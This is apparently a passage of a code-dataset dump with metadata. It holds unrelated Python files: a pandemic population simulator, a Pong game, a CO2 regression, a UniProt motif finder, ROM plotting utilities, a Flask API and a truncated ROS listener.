get_minor_routines, get_adult_routines\nfrom ..environment import Home, CityRegistry, Person, Risk, Minor, School, Worker, Retired, JobCounselor, \\\n PopulationParams\n\n__all__ = ['make_us_age_population']\n\nage_group = range(2, 101)\n\n\ndef get_us_age_distribution(num_persons: int,\n numpy_rng: Optional[np.random.RandomState] = None) -> List[int]:\n numpy_rng = numpy_rng if numpy_rng is not None else np.random.RandomState()\n age_p = np.zeros(100)\n for i, age in enumerate(age_group):\n if age < 60:\n age_p[i] = numpy_rng.normal(1, 0.05)\n else:\n age_p[i] = (1 + (age - 60) * (0.05 - 1) / (100 - 60)) * numpy_rng.normal(1, 0.05)\n age_p /= np.sum(age_p)\n ages = [numpy_rng.choice(np.arange(1, 101), p=age_p) for _ in range(num_persons)]\n print(f'Average age: {np.average(ages)}')\n return ages\n\n\ndef make_us_age_population(population_params: PopulationParams,\n registry: CityRegistry,\n regulation_compliance_prob: float = 1.0,\n numpy_rng: Optional[np.random.RandomState] = None) -> List[Person]:\n home_ids = registry.location_ids_of_type(Home)\n school_ids = registry.location_ids_of_type(School)\n num_persons = population_params.num_persons\n\n numpy_rng = numpy_rng if numpy_rng is not None else np.random.RandomState()\n\n job_counselor = JobCounselor(population_params, registry, numpy_rng=numpy_rng)\n\n # assign age (based on the age profile of USA)\n ages = get_us_age_distribution(num_persons, numpy_rng=numpy_rng)\n ages.sort()\n persons: List[Person] = []\n # last 15% of homes in homes_id are for retirees only (1-2 retirees each)\n retired_homes = int((float(len(home_ids))) * 0.15)\n family_homes = len(home_ids) - retired_homes\n age_iter = 0\n # assign minors randomly to family homes\n while ages[age_iter] <= 18:\n age = ages[age_iter]\n home_id = home_ids[numpy_rng.randint(0, family_homes)]\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n school_id = school_ids[numpy_rng.randint(0, len(school_ids))]\n persons.append(Minor(age, home_id, registry=registry, risk=risk, school=school_id,\n outside_school_routines=get_minor_routines(home_id, registry, numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'minor_{age_iter}'))\n age_iter += 1\n home_iter = 0\n # assign adults to family homes, each family home must have at least one adult\n while home_iter < family_homes:\n home_id = home_ids[home_iter]\n num_adults = numpy_rng.randint(1, 2)\n if ages[age_iter] > 65:\n break\n for i in range(num_adults):\n age = ages[age_iter]\n if age > 65:\n break\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n work_id = job_counselor.next_available_work_id()\n assert work_id is not None, 'Not enough available jobs, increase assignee capacity of certain businesses'\n persons.append(Worker(age, home_id, registry=registry, risk=risk, work=work_id,\n outside_work_routines=get_adult_routines(Worker, home_id, registry,\n numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'worker_{age_iter}'))\n age_iter += 1\n home_iter += 1\n # if there are remaining adults to be assigned, but all family homes have at least one adult already,\n # loop back to beginning of home_ids\n if ages[age_iter] <= 65 and home_iter >= family_homes:\n home_iter = 0\n home_iter = family_homes\n # fill retiree homes\n while family_homes < home_iter < len(home_ids):\n home_id = home_ids[home_iter]\n num_retirees = numpy_rng.randint(1, 3)\n for i in range(num_retirees):\n age = ages[age_iter]\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n persons.append(Retired(age, home_id, registry=registry, risk=risk,\n routines=get_adult_routines(Retired, home_id, registry, numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'retired_{age_iter}'))\n age_iter += 1\n home_iter += 1\n home_iter = 0\n # assign remaining retirees to family homes\n while age_iter < len(ages):\n home_id = home_ids[home_iter]\n num_retirees = numpy_rng.randint(1, 2)\n for i in range(num_retirees):\n age = ages[age_iter]\n risk = numpy_rng.choice([Risk.LOW, Risk.HIGH], p=[1 - age / age_group.stop, age / age_group.stop])\n persons.append(Retired(age, home_id, registry=registry, risk=risk,\n routines=get_adult_routines(Retired, home_id, registry, numpy_rng=numpy_rng),\n regulation_compliance_prob=regulation_compliance_prob,\n numpy_rng=numpy_rng,\n name=f'retired_{age_iter}'))\n age_iter += 1\n home_iter += 1\n if home_iter >= len(home_ids):\n home_iter = 0\n return persons\n","sub_path":"python/pandemic_simulator/script_helpers/population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"31299177","text":"from collections import Counter\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n if len(s) != len(t):\n return False\n sC = Counter(s)\n tC = Counter(t)\n for x in sC:\n if sC[x] != tC[x]:\n return False\n return True\n\nprint(Solution.isAnagram(Solution, \"cat\", \"ta\"))","sub_path":"Leetcode/Valid Anagram(242).{python3}/ValidAnagram.py","file_name":"ValidAnagram.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"610792551","text":"import sys\nimport cgitb\nimport traceback\n\ndef func(a, b):\n return a / b\n\nif __name__ == \"__main__\":\n cgitb.enable(format = 'text')\n x = 10\n y = 100\n func(x, y)\n y = 0\n func(x ,y)\n \n","sub_path":"python-inspect/python_inspect/cgitb_test.py","file_name":"cgitb_test.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"415333499","text":"from pygame import *\r\nwidht = 700\r\nhight = 600\r\nFPS = 120\r\nclass GameSprite(sprite.Sprite):\r\n def __init__(self, player_image, player_x, player_y, player_w, player_h, player_speed, player_speed2 = 0):\r\n super().__init__()\r\n self.image = transform.scale(image.load(player_image), (player_w, player_h))\r\n self.speed = player_speed\r\n self.speed2 = player_speed2\r\n self.rect = self.image.get_rect()\r\n self.rect.x = player_x\r\n self.rect.y = player_y\r\n def reset(self):\r\n window.blit( self.image, (self.rect.x, self.rect.y))\r\n\r\n\r\nclass Player(GameSprite):\r\n def update1(self):\r\n keys = key.get_pressed()\r\n if keys [K_w] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if keys [K_s] and self.rect.y < 450:\r\n self.rect.y += self.speed\r\n def update2(self):\r\n keys = key.get_pressed()\r\n if keys [K_UP] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if keys [K_DOWN] and self.rect.y < 450:\r\n self.rect.y += self.speed\r\n\r\n\r\nclass Ball(GameSprite):\r\n def update(self):\r\n self.rect.x += self.speed\r\n self.rect.y += self.speed2\r\n if self.rect.y < 0:\r\n self.speed2 *= -1\r\n if self.rect.y > 550:\r\n self.speed2 *= -1\r\n \r\nfont.init()\r\nfont1 = font.Font(None, 40)\r\nfin1 = font1.render(\"Player 2 win!\", 1, (0, 255, 0)) \r\nfin2 = font1.render(\"Player 1 win!\", 1, (0, 255, 0)) \r\nrok1 = Player(\"raketka.png\", 10, 50, 50, 150, 7)\r\nrok2 = Player(\"raketka.png\", 645, 400, 50, 150, 7)\r\nball = Ball(\"algoball.png\", 270 , 320, 50, 50, 8, 8) \r\npl1 = font1.render(\"Player 1\", 1, (0, 255, 0))\r\npl2 = font1.render(\"Player 2\", 1, (0, 255, 0))\r\nkub1 = GameSprite(\"algokub.png\", 50, 70, 150, 150, 0)\r\nkub2 = GameSprite(\"algokub.png\", 520, 70, 150, 150, 0)\r\n\r\nwindow = display.set_mode((widht, hight))\r\ndisplay.set_caption(\"Ping-Pong\")\r\nwindow.fill((200, 200, 255))\r\nfinish = False\r\nrun = True\r\nwhile run:\r\n window.fill((200, 200, 255))\r\n for e in event.get():\r\n if e.type == QUIT:\r\n run = False\r\n ball.reset()\r\n ball.update()\r\n rok1.reset()\r\n rok1.update1()\r\n window.blit(pl1, (15, 15))\r\n window.blit(pl2, (575, 15))\r\n rok2.reset()\r\n rok2.update2()\r\n if ball.rect.x < 0:\r\n finish = True\r\n window.blit(fin1, (260, 300))\r\n kub2.reset()\r\n kub2.update()\r\n if ball.rect.x > 650:\r\n finish = True\r\n window.blit(fin2, (260, 300))\r\n kub1.reset()\r\n kub1.update()\r\n if sprite.collide_rect(ball, rok1) or sprite.collide_rect(ball, rok2):\r\n ball.speed *= -1\r\n display.update()\r\n time.delay(50)\r\n","sub_path":"Ping-Pong.py","file_name":"Ping-Pong.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2577948","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport math\nimport numpy as np\n\nurl = 'ftp://aftp.cmdl.noaa.gov/products/trends/co2/co2_mm_mlo.txt'\ndata = pd.read_csv(url, delimiter='\\s+', skiprows=72,\n names=['0','1','decimal date','average','interpolated','trend','#days'])\n\n# time (t) goes on the x-axis anc co2 goes on the y-axis\n\nco2 = data['interpolated']\n\nt = data['decimal date'] # by default, statsmodels doesn't compute y-intercept\nT = sm.add_constant(t)\ntsquared = t**2 # squaring provides the 'quadratic' aspect\nTsquared = sm.add_constant(tsquared) # again, by default, statsmodels doesn't compute y-intercept\n\nmodel = smf.ols(formula = 'co2 ~ T + Tsquared', data = data).fit()\nresults = model.fittedvalues\nprint(model.summary())\n\nplt.figure(1)\nplt.subplot(211)\nplt.plot(t, co2)\nplt.plot(t, results)\nplt.title('Quadratic Model of Atmospheric CO2 at Mauna Loa Observatory')\nplt.ylabel('CO2 Concentration (ppmv)')\n\nresiduals = model.resid\n# c1 = np.cos(2*math.pi*t)\n# s1 = np.sin(2*math.pi*t)\n# residualModel = smf.ols(formula = 'residuals ~ T + Tsquared + c1 + s1', data = residuals).fit()\n\nplt.subplot(212)\nplt.plot(t, residuals)\n# plt.plot(t, residualModel.fittedvalues)\nplt.ylabel('Residuals (ppmv)')\nplt.xlabel('Time (years)')\nplt.title('Residuals showing sinusoidal shape')\nplt.show()","sub_path":"chapter2/b.quadratic_model.py","file_name":"b.quadratic_model.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"101991420","text":"from client import *\nimport os \nimport csv\n\naudio_dir = 'cmu_us_bdl_arctic/wav/'\naudio_files = os.listdir(audio_dir)\n\nmodel = 'models/output_graph.pbmm'\nalphabet = 'models/alphabet.txt'\nlm = 'models/lm.binary'\ntrie = 'models/trie'\nf = open('result.csv', 'w')\n \nfor idx, audio in enumerate(audio_files):\n\ttext = predict(model, alphabet, lm, trie, os.path.join(audio_dir, audio))\n\twriter = csv.writer(f)\n\twriter.writerow([audio, text])\n\tprint('Done convering audio :', idx)\n\tif idx == 100: break\t\n","sub_path":"predict_for_all.py","file_name":"predict_for_all.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"138460198","text":"#Finding a protein motif - from a list of uniport_id, obtain complete description and features of each (from UniProt site)\n#For each protein possessing the N-glycosylation motif, output the access ID following a list of locations in the protein strings where the motif can be found\n#For each protein possessing the N-glycosylation motif, output its given access ID followed by a list of locations in the protein string where the motif can be found.\n\nlink = 'http://www.uniprot.org/uniprot/'\nfrom urllib.request import urlretrieve #urllib & Requests libraries to automate file download in Python\nimport re\nwith open('file') as f:\n fjoin = ' '.join(line.strip() for line in f)\n fsplit = fjoin.split(' ') #fjoin & fsplit must be invoked to get the input filenames in a list without '\\n'\n for protein in fsplit:\n url = link+protein+'.fasta'\n urlretrieve(url,protein+'.txt')\n #idx = []\n #jseq = []\n with open(protein+'.txt') as sequence:\n seq = sequence.readlines()[1:]\n seq = ''.join(line.strip() for line in seq)\n N_idx = []\n N = []\n for i,j in enumerate(seq):\n if j == 'N':\n N.append(seq[i:i+4])\n N_idx.append(i+1) #this is the N_location (or start sequence but not N-gly site)\n #to assert whether N_gly is really N-glycosylation site: validate values\n pattern = re.compile('N[^P][S|T][^P]')\n bN_gly = []\n for iN in N:\n result = pattern.match(iN)\n bN_gly.append(bool(result))\n #print(bN_gly)\n a= dict(list(zip(N_idx,bN_gly)))\n N_gly = []\n for k,v in a.items():\n if v == True:\n N_gly.append(k)\n if N_gly != []:\n print(protein)\n print(*(sorted(N_gly, reverse=False)), sep=' ')\n\n #N{P}[ST]{P} - starts N, then any except P, then either S OR T, then any except P","sub_path":"motif_implies_function.py","file_name":"motif_implies_function.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229243327","text":"# step4_plot.py\n\"\"\"Simulate learned ROMs and visualize results. Figures are saved in the folder\ngiven by config.figures_path().\n\nExamples\n--------\n# Plot time traces of each variable at the monitor locations for the ROM\n# trained from 10,000 snapshots with 22 POD modes and a regularization\n# parameter 4e4.\n$ python3 step4_plot.py 10000 --time-traces --modes 22 --regularization 4e4\n\n# Plot spatial averages and species integrals for the ROM trained from\n# 20,000 snapshots with 44 POD modes and a regularization parameter 5e4.\n$ python3 step4_plot.py 20000 --species-integral -modes 44 --regularization 5e4\n\nLoading Results\n---------------\n>>> import config\n>>> print(\"figures are saved to\", config.figures_path())\n\nCommand Line Arguments\n----------------------\n\"\"\"\nimport h5py\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport rom_operator_inference as roi\n\nimport config\nimport utils\nimport data_processing as dproc\n\n\n# Helper functions ============================================================\n\ndef simulate_rom(trainsize, r, reg, steps=None):\n \"\"\"Load everything needed to simulate a given ROM, simulate the ROM,\n and return the simulation results and everything needed to reconstruct\n the results in the original high-dimensional space.\n Raise an Exception if any of the ingredients are missing.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n Regularization parameter used to train the ROM.\n\n steps : int or None\n Number of time steps to simulate the ROM.\n\n Returns\n -------\n t : (nt,) ndarray\n Time domain corresponding to the ROM outputs.\n\n V : (config*NUM_ROMVARS*config.DOF,r) ndarray\n POD basis used to project the training data (and for reconstructing\n the full-order scaled predictions).\n\n scales : (NUM_ROMVARS,4) ndarray\n Information for how the data was scaled. See data_processing.scale().\n\n x_rom : (nt,r) ndarray\n Prediction results from the ROM.\n \"\"\"\n # Load the time domain, basis, initial conditions, and trained ROM.\n t = utils.load_time_domain(steps)\n V, _ = utils.load_basis(trainsize, r)\n X_, _, _, scales = utils.load_projected_data(trainsize, r)\n rom = utils.load_rom(trainsize, r, reg)\n\n # Simulate the ROM over the full time domain.\n with utils.timed_block(f\"Simulating ROM with r={r:d}, \"\n f\"reg={reg:e} over full time domain\"):\n x_rom = rom.predict(X_[:,0], t, config.U, method=\"RK45\")\n\n return t, V, scales, x_rom\n\n\ndef get_traces(locs, data, V=None, scales=None):\n \"\"\"Reconstruct time traces from data, unprojecting and unscaling if needed.\n\n Parameters\n ----------\n locs : (l,nt) ndarray\n Index locations for the time traces to extract.\n\n data : (r,nt) or (config.DOF*config.NUM_ROMVARS,nt) ndarray\n Data from which to extract the time traces, either the output of a ROM\n or a high-dimensional data set.\n\n V : (config.DOF*config.NUM_ROMVARS,r) ndarray or None\n Rank-r POD basis. Only needed if `data` is low-dimensional ROM output.\n\n scales : (config.NUM_ROMVARS,4) ndarray or None\n Information for how the data was scaled (see data_processing.scale()).\n Only needed if `data` is low-dimensional ROM output.\n\n Returns\n -------\n traces : (l,nt) ndarray\n The specified time traces.\n \"\"\"\n # TODO: input shape checking\n if V is not None and scales is not None:\n return dproc.unscale(V[locs] @ data, scales)\n else:\n return data[locs]\n\n\ndef get_feature(key, data, V=None, scales=None):\n \"\"\"Reconstruct a statistical feature from data, unprojecting and\n unscaling if needed.\n\n Parameters\n ----------\n key : str\n Which statistical feature to calculate (T_mean, CH4_sum, etc.)\n\n data : (r,nt) or (config.DOF*config.NUM_ROMVARS,nt) ndarray\n Data from which to extract the features, either the output of a ROM\n or a high-dimensional data set.\n\n V : (config.DOF*config.NUM_ROMVARS,r) ndarray or None\n Rank-r POD basis. Only needed if data is low-dimensional ROM output.\n\n scales : (config.NUM_ROMVARS,4) ndarray or None\n Information for how the data was scaled (see data_processing.scale()).\n Only needed if `data` is low-dimensional ROM output.\n\n Returns\n -------\n feature : (nt,) ndarray\n The specified statistical feature.\n \"\"\"\n # TODO: input shape checking\n var, action = key.split('_')\n print(f\"{action}({var})\", end='..', flush=True)\n if V is not None and scales is not None:\n variable = dproc.unscale(dproc.getvar(var, V) @ data, scales, var)\n else:\n variable = dproc.getvar(var, data)\n return eval(f\"variable.{action}(axis=0)\")\n\n\n# Plot routines ===============================================================\n\ndef time_traces(trainsize, r, reg, elems):\n \"\"\"Plot the time trace of each variable in the original data at the monitor\n location, and the time trace of each variable of the ROM reconstruction at\n the same locations. One figure is generated per variable.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n Regularization parameter used to train the ROM.\n\n elems : list(int) or ndarray(int)\n Indices in the spatial domain at which to compute the time traces.\n \"\"\"\n # Get the indicies for each variable.\n elems = np.atleast_1d(elems)\n nelems = elems.size\n nrows = (nelems // 2) + (1 if nelems % 2 != 0 else 0)\n elems = np.concatenate([elems + i*config.DOF\n for i in range(config.NUM_ROMVARS)])\n\n # Load and lift the true results.\n data, _ = utils.load_gems_data(rows=elems[:nelems*config.NUM_GEMSVARS])\n with utils.timed_block(\"Lifting GEMS time trace data\"):\n traces_gems = dproc.lift(data)\n\n # Load and simulate the ROM.\n t, V, scales, x_rom = simulate_rom(trainsize, r, reg)\n\n # Reconstruct and rescale the simulation results.\n simend = x_rom.shape[1]\n with utils.timed_block(\"Reconstructing simulation results\"):\n traces_rom = dproc.unscale(V[elems] @ x_rom, scales)\n\n # Save a figure for each variable.\n xticks = np.arange(t[0], t[-1]+.001, .002)\n for i,var in enumerate(config.ROM_VARIABLES):\n fig, axes = plt.subplots(nrows, 2 if nelems > 1 else 1,\n figsize=(9,3*nrows), sharex=True)\n axes = np.atleast_2d(axes)\n for j, ax in enumerate(axes.flat):\n idx = j + i*nelems\n ax.plot(t, traces_gems[idx,:], lw=1, **config.GEMS_STYLE)\n ax.plot(t[:simend], traces_rom[idx,:], lw=1, **config.ROM_STYLE)\n ax.axvline(t[trainsize], color='k', lw=1)\n ax.set_xlim(t[0], t[-1])\n ax.set_xticks(xticks)\n ax.set_title(f\"Location ${j+1}$\", fontsize=12)\n ax.locator_params(axis='y', nbins=2)\n for ax in axes[-1,:]:\n ax.set_xlabel(\"Time [s]\", fontsize=12)\n for ax in axes[:,0]:\n ax.set_ylabel(config.VARLABELS[var], fontsize=12)\n\n # Single legend to the right of the subplots.\n fig.tight_layout(rect=[0, 0, .85, 1])\n leg = axes[0,0].legend(loc=\"center right\", fontsize=14,\n bbox_to_anchor=(1,.5),\n bbox_transform=fig.transFigure)\n for line in leg.get_lines():\n line.set_linewidth(2)\n\n # Save the figure.\n utils.save_figure(\"timetrace\"\n f\"_{config.TRNFMT(trainsize)}\"\n f\"_{config.DIMFMT(r)}\"\n f\"_{config.REGFMT(reg)}_{var}.pdf\")\n\n\ndef save_statistical_features():\n \"\"\"Compute the (spatial) mean temperatures on the full time domain and\n save them for later. This only needs to be done once.\n \"\"\"\n # Load the full data set.\n gems_data, t = utils.load_gems_data()\n\n # Lift the data (convert to molar concentrations).\n with utils.timed_block(\"Lifting GEMS data\"):\n lifted_data = dproc.lift(gems_data)\n\n # Compute statistical features.\n with utils.timed_block(\"Computing statistical features of variables\"):\n mins, maxs, sums, stds, means = {}, {}, {}, {}, {}\n for var in config.ROM_VARIABLES:\n val = dproc.getvar(var, lifted_data)\n mins[var] = val.min(axis=0)\n maxs[var] = val.max(axis=0)\n sums[var] = val.sum(axis=0)\n stds[var] = val.std(axis=0)\n means[var] = sums[var] / val.shape[0]\n\n # Save the data.\n data_path = config.statistical_features_path()\n with utils.timed_block(\"Saving statistical features\"):\n with h5py.File(data_path, 'w') as hf:\n for var in config.ROM_VARIABLES:\n hf.create_dataset(f\"{var}_min\", data=mins[var])\n hf.create_dataset(f\"{var}_max\", data=maxs[var])\n hf.create_dataset(f\"{var}_sum\", data=sums[var])\n hf.create_dataset(f\"{var}_std\", data=stds[var])\n hf.create_dataset(f\"{var}_mean\", data=means[var])\n hf.create_dataset(\"time\", data=t)\n logging.info(f\"Statistical features saved to {data_path}\")\n\n\ndef statistical_features(trainsize, r, reg):\n \"\"\"Plot spatially averaged temperature and spacially itegrated (summed)\n species concentrations over the full time domain.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n Regularization parameter used to train the ROM.\n \"\"\"\n # Load the true results.\n keys = [f\"{var}_mean\" for var in config.ROM_VARIABLES[:4]]\n keys += [f\"{var}_sum\" for var in config.SPECIES]\n feature_gems, t = utils.load_statistical_features(keys)\n keys = np.reshape(keys, (4,2), order='F')\n\n # Load and simulate the ROM.\n t, V, scales, x_rom = simulate_rom(trainsize, r, reg)\n\n # Initialize the figure.\n fig, axes = plt.subplots(keys.shape[0], keys.shape[1],\n figsize=(9,6), sharex=True)\n\n # Calculate and plot the results.\n for ax,key in zip(axes.flat, keys.flat):\n with utils.timed_block(f\"Reconstructing\"):\n feature_rom = get_feature(key, x_rom, V, scales)\n ax.plot(t, feature_gems[key], lw=1, **config.GEMS_STYLE)\n ax.plot(t[:x_rom.shape[1]], feature_rom, lw=1, **config.ROM_STYLE)\n ax.axvline(t[trainsize], color='k')\n ax.set_ylabel(config.VARLABELS[var])\n ax.locator_params(axis='y', nbins=2)\n\n # Set titles, labels, ticks, and draw a single legend.\n for ax in axes[-1,:]:\n ax.set_xlim(t[0], t[-1])\n ax.set_xticks(np.arange(t[0], t[-1]+.001, .002))\n ax.set_xlabel(\"Time [s]\", fontsize=12)\n axes[0,0].set_title(\"Spatial Averages\", fontsize=14)\n axes[0,1].set_title(\"Spatial Integrals\", fontsize=14)\n\n # Legend on the right.\n fig.tight_layout(rect=[0, 0, .85, 1])\n leg = axes[0,0].legend(loc=\"center right\", fontsize=14,\n bbox_to_anchor=(1,.5),\n bbox_transform=fig.transFigure)\n for line in leg.get_lines():\n line.set_linewidth(2)\n\n utils.save_figure(f\"statfeatures\"\n f\"_{config.TRNFMT(trainsize)}\"\n f\"_{config.DIMFMT(r)}\"\n f\"_{config.REGFMT(reg)}.pdf\")\n\n# =============================================================================\n\ndef main(trainsize, r, reg, elems,\n plotTimeTrace=False, plotStatisticalFeatures=False):\n \"\"\"Make the indicated visualization.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. This is also the number of retained POD\n modes (left singular vectors) used to project the training data.\n\n reg : float\n The regularization parameters used to train each ROM.\n\n elems : list(int) or ndarray(int)\n Indices in the spatial domain at which to compute time traces.\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Time traces (single ROM, several monitoring locations).\n if plotTimeTrace:\n logging.info(\"TIME TRACES\")\n time_traces(trainsize, r, reg, elems)\n\n # Statistical features (single ROM, several features).\n if plotStatisticalFeatures:\n logging.info(\"STATISTICAL FEATURES\")\n # Compute GEMS features if needed (only done once).\n if not os.path.isfile(config.statistical_features_path()):\n save_statistical_features()\n statistical_features(trainsize, r, reg)\n\n\n# =============================================================================\nif __name__ == \"__main__\":\n # Set up command line argument parsing.\n import argparse\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.usage = f\"\"\" python3 {__file__} --help\n python3 {__file__} TRAINSIZE --time-traces\n --modes R --regularization REG\n --location M [...]\n python3 {__file__} TRAINSIZE --statistical-features\n --modes R --regularization REG\"\"\"\n # Positional arguments\n parser.add_argument(\"trainsize\", type=int,\n help=\"number of snapshots in the training data\")\n\n # Routine indicators\n parser.add_argument(\"-tt\", \"--time-traces\", action=\"store_true\",\n help=\"plot time traces for the given \"\n \"basis sizes and regularization parameters \"\n \"at the specified monitoring locations\")\n parser.add_argument(\"-sf\", \"--statistical-features\", action=\"store_true\",\n help=\"plot spatial averages and species integrals \"\n \"for the ROM with the given basis size and \"\n \"regularization parameters\")\n\n # Other keyword arguments\n parser.add_argument(\"-r\", \"--modes\", type=int, required=True,\n help=\"number of POD modes used to project data\")\n parser.add_argument(\"-reg\", \"--regularization\", type=float, required=True,\n help=\"regularization parameter used in ROM training\")\n parser.add_argument(\"-loc\", \"--location\", type=int, nargs='+',\n default=config.MONITOR_LOCATIONS,\n help=\"monitor locations for time trace plots\")\n\n # Do the main routine.\n args = parser.parse_args()\n main(trainsize=args.trainsize, r=args.modes, reg=args.regularization,\n plotTimeTrace=args.time_traces, elems=args.location,\n plotStatisticalFeatures=args.statistical_features)\n","sub_path":"step4_plot.py","file_name":"step4_plot.py","file_ext":"py","file_size_in_byte":15302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"262953083","text":"# -*- encoding: utf-8 -*-\nfrom flask import Blueprint\nfrom flask import request\nfrom flask import jsonify\n\nfrom discograph import decorators\nfrom discograph import exceptions\nfrom discograph import helpers\n\n\nblueprint = Blueprint('api', __name__, template_folder='templates')\n\n\n@blueprint.route('/random')\n@decorators.limit(max_requests=60, period=60)\ndef route__api__random():\n role_names = ['Alias', 'Member Of']\n entity_type, entity_id = helpers.discograph_api.get_random_entity(role_names=role_names)\n entity_type = {\n 1: 'artist',\n 2: 'label',\n }[entity_type]\n data = {'center': '{}-{}'.format(entity_type, entity_id)}\n return jsonify(data)\n\n\n@blueprint.route('/artist/network/')\n@decorators.limit(max_requests=60, period=60)\ndef route__api__artist__network__artist_id(artist_id):\n on_mobile = request.MOBILE\n data = helpers.discograph_api.get_artist_network(artist_id, on_mobile=on_mobile)\n if data is None:\n raise exceptions.APIError()\n return jsonify(data)\n\n\n@blueprint.route('/search/')\n@decorators.limit(max_requests=120, period=60)\ndef route__api__search(search_string):\n data = helpers.discograph_api.search_entities(search_string)\n return jsonify(data)\n\n\n@blueprint.route('/ping')\n@decorators.limit(max_requests=200, period=60)\ndef route__api__ping():\n print('PING', request.remote_addr)\n return jsonify({'ping': True})","sub_path":"discograph/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569366042","text":"\nclass fActivityPesertaBeasiswa:\n def __init__(self, formObj, parentForm):\n self.app = formObj.ClientApplication\n if parentForm!=None:\n self.parentForm = parentForm\n else:\n self.parentForm = None\n\n def Show(self):\n self.FormContainer.Show()\n\n def bCancelClick(self, button):\n button.ExitAction = 2\n if self.parentForm != None:\n self.parentForm.FormObject.Close(2)\n\n def bSaveClick(self, button):\n\n ph = self.app.CreatePacket()\n packet = ph.Packet\n\n self.FormObject.CommitBuffer()\n ph = self.FormObject.GetDataPacket()\n try:\n res = self.FormObject.CallServerMethod('SimpanData', ph)\n except:\n raise\n \n\n\n button.ExitAction = 1\n if self.parentForm != None:\n self.parentForm.FormObject.Close(1)\n \n def AfterAgendaLookup(self, sender, linkui):\n uipart = self.uipinit\n uipart.Edit()\n uipart.aid = uipart.GetFieldValue('LAgenda.AgendaItemTemplateId')\n\n def AfterMustahiqLookup(self, sender, linkui):\n uipart = self.uipinit\n uipart.Edit()\n uipart.msid = uipart.GetFieldValue('Peserta.MustahiqId')\n uipart.pid = uipart.GetFieldValue('Peserta.ProductId')\n uipart.SetFieldValue('Pendamping.CompanionId', uipart.GetFieldValue('Peserta.CompanionId'))\n ph = self.app.CreateValues(['key', uipart.GetFieldValue('Peserta.CompanionId')])\n res = self.FormObject.CallServerMethod('GetPendamping', ph)\n #raise 'tes', res.FirstRecord.nama\n uipart.SetFieldValue('Pendamping.LCompanion.LCustomer.CustomerName', res.FirstRecord.nama)\n self.peserta_Pendamping.Enabled = 0\n self.peserta_Peserta.Enabled = 0\n \n def AfterPendampingLookup(self, sender, linkui):\n sender.Enabled = 0\n \n def BeforeMustahiqLookup(self, sender, linkui):\n uipart = self.uipinit\n cid = uipart.GetFieldValue('Pendamping.CompanionId')\n if cid not in (None,'', 0):\n linkui.OQLText = \"select from MustahiqProduct \\\n [CompanionId = %d] \\\n (MustahiqExtNumber, \\\n LMustahiq.LCustomer.CustomerName , \\\n MustahiqId, \\\n ProductId, \\\n CompanionId, \\\n self);\" % cid\n return 1\n\n","sub_path":"dialogs/Beasiswa/fActivityPesertaBeasiswa_intr.py","file_name":"fActivityPesertaBeasiswa_intr.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98794536","text":"#!/usr/bin/env python\nimport os\nimport os.path\nimport sys\nimport signal\nimport rospy\nimport rosparam\n\nfrom sensor_msgs.msg import *\nfrom vision_msgs.msg import *\nfrom geometry_msgs.msg import *\nfrom std_msgs.msg import *\nfrom socialrobot_perception_msgs.srv import *\nfrom socialrobot_perception_msgs.msg import *\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\n\n\nclass PerceptionListener():\n def __init__(self):\n self.obj_name2id={}\n\n self.current_obstacles = {}\n self.current_robots = {}\n self.current_joints = {}\n\n self.robot_count=0\n\n rospy.Subscriber('/joint_states', JointState, self.callback_joints, queue_size=10)\n 